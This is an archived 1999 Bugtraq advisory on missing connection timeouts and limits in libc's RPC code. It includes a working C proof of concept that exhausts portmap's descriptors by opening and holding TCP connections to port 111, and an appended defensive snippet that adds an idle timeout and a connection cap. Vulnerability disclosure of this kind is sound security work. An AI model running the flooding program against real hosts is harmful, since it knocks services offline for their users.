X-Sender: lluzar@nova.kki.krakow.pl
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:
Date: Wed, 14 Apr 1999 15:26:14 +0200
Reply-To: Lukasz Luzar
Sender: Bugtraq List
From: Lukasz Luzar
Subject: KKIS.08041999.001.b - security report - flaws in RPC part of libc
To: BUGTRAQ@netspace.org

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                               S E C U R I T Y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

KKI Security Team
Cracow Commercial Internet, Poland
http://www.security.kki.pl
http://www.kki.pl
mailto:security@security.kki.pl
mailto:biuro@kki.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Report title        : Shortcomings of the RPC implementation in libc
                      libraries and how they affect, for example, portmap.
Problem found by    : Lukasz Luzar (lluzar@security.kki.pl)
Report created by   : Robert Pajak (shadow@security.kki.pl)
                      Lukasz Luzar (lluzar@security.kki.pl)
Problem found at    : 08 April 1999
Report published    : 14 April 1999
Report code         : KKIS.08041999.001.b
Short description   : full description below
Vulnerable versions : libc*, up to current.
Platforms affected  : Linux X.X, FreeBSD X.X, probably others...
Patches             : currently not available
Archive             : http://www.security.kki.pl/advisories/
Impact description  : full description below
Risk level          : medium
Notes               : we were unable to contact the authors of libc

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

It seems that libc's RPC implementation checks neither how long established
connections have been open nor how many sockets are connected at once. This
is quite dangerous, because many network services are built on these
functions.

~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Below is a program which shows how to DoS portmap (TCP). When no maximum
limit of descriptors per process is set (e.g. the default settings on
FreeBSD), this can easily lead to heavy problems with the stability of the
victim's machine. When the limit of open descriptors is reached, portmap
begins to refuse all new connections.

~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example sources ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- CUT HERE ---
/*
 * example.c by Lukasz Luzar (lluzar@security.kki.pl)
 */

#include <stdio.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define ADDR "10.0.0.1"   // victim's IP address in dot notation
#define PORT 111          // victim service to DoS, e.g. portmapper

int main(void)
{
    int sockfd, n = 0;
    struct sockaddr_in victim_addr;

    bzero((char *) &victim_addr, sizeof(victim_addr));
    victim_addr.sin_family = AF_INET;
    victim_addr.sin_addr.s_addr = inet_addr(ADDR);
    victim_addr.sin_port = htons(PORT);

    fprintf(stdout, "Opening new connections...\n");

    /* keep opening connections until socket() or connect() fails */
    for (;;) {
        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
            fprintf(stderr, "socket error at %d\n", n);
            break;
        }
        if (connect(sockfd, (struct sockaddr *) &victim_addr,
                    sizeof(victim_addr)) < 0) {
            fprintf(stderr, "connect error at %d\n", n);
            break;
        }
        n++;
    }

    fprintf(stdout, "Established %d connections and waiting...\n", n);

    /* hold all the connections open indefinitely */
    for (;;);

    return 0;
}
--- CUT HERE ---

~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.

All questions please address to mailto:security@security.kki.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
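The two checks the Description says the libc RPC server loop lacks, an idle timeout and a cap on concurrent clients, written out as a small connection table that a TCP service such as portmap could apply to the descriptors it accepts. This is an added example, not code from the advisory or from any libc; MAX_CONNS, IDLE_TIMEOUT and the function names are assumptions.

```c
/* Added example (not from the advisory): admission policy for accepted TCP
 * clients. Integration: call reap_idle() each time select() times out and
 * close() the descriptors it hands back; call admit_conn() after accept()
 * and close the new fd if it is refused; call touch_conn() whenever a
 * request is read. A flood like example.c then occupies at most MAX_CONNS
 * slots and is expired after IDLE_TIMEOUT seconds instead of exhausting the
 * per-process descriptor limit. */
#include <time.h>

#define MAX_CONNS    8    /* assumed cap on tracked clients (portmap had none) */
#define IDLE_TIMEOUT 30   /* assumed: seconds a client may stay silent */

struct conn { int fd; time_t last_active; };
struct conn_table { struct conn slots[MAX_CONNS]; int count; };

/* Move every connection silent for longer than IDLE_TIMEOUT out of the table
 * into expired[] so the caller can close() them; returns how many there were. */
int reap_idle(struct conn_table *t, time_t now, int expired[MAX_CONNS])
{
    int n = 0;
    for (int i = 0; i < t->count; ) {
        if (now - t->slots[i].last_active > IDLE_TIMEOUT) {
            expired[n++] = t->slots[i].fd;
            t->slots[i] = t->slots[--t->count];   /* swap-remove; order is irrelevant */
        } else {
            i++;
        }
    }
    return n;
}

/* Track a freshly accept()ed descriptor. Returns 1 if admitted, 0 if the table
 * is full, in which case only this client is refused and the rest keep working. */
int admit_conn(struct conn_table *t, int fd, time_t now)
{
    if (t->count >= MAX_CONNS)
        return 0;
    t->slots[t->count].fd = fd;
    t->slots[t->count].last_active = now;
    t->count++;
    return 1;
}

/* Refresh the activity timestamp when a request arrives on fd; 1 if fd was tracked. */
int touch_conn(struct conn_table *t, int fd, time_t now)
{
    for (int i = 0; i < t->count; i++)
        if (t->slots[i].fd == fd) { t->slots[i].last_active = now; return 1; }
    return 0;
}
```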